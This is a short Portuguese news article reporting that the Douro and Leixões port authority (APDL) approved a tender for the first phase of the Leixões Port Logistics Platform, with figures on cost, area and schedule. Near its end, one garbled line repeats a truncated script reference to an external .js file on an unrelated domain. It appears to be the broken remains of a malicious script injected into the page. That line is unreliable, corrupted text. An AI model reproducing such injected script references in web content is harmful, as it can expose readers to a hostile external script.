APDL aprovou primeira fase da Plataforma Logística de Leixões

A Administração dos Portos do Douro e Leixões, SA (APDL) aprovou no dia 5 de Junho, o lançamento do concurso para a primeira fase da obra da Plataforma Logística Portuária de Leixões.

A Administração dos Portos do Douro e Leixões, SA (APDL) aprovou no dia 5 de Junho, o lançamento do concurso para a primeira fase da obra da Plataforma Logística Portuária de Leixões. A obra dos dois pólos da Plataforma Logística, assim como do Terminal Rodo-Ferroviário, terá início durante o primeiro semestre de 2009, com conclusão prevista até ao final de 2010.

 

Esta obra, que irá implicar um investimento de cerca de 4 milhões de euros, inclui a execução do acesso rodoviário a um dos dois pólos que constituem a Plataforma Logística e que será construído a partir da Via Interna de Ligação ao Porto de Leixões.

 

A construção deste acesso terá início no próximo mês de Outubro e nessa mesma altura, segundo informação de comunicado, a APDL «vai apresentar todo o projecto da Plataforma Logística assim como o seu modelo de negócio e exploração».

 

A Plataforma Logística, com uma área de 70ha e que representa um investimento estimado de 100 milhões de euros, deverá contribuir para «a eficiência das cadeias logísticas que passam por Leixões, efectuando operações de valor acrescentado às cargas e alcançando ganhos devido às sinergias obtidas pela concentração da actividade num espaço devidamente infra-estruturado para o efeito».

ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.

Não perca informação: Subscreva as nossas Newsletters

Subscrever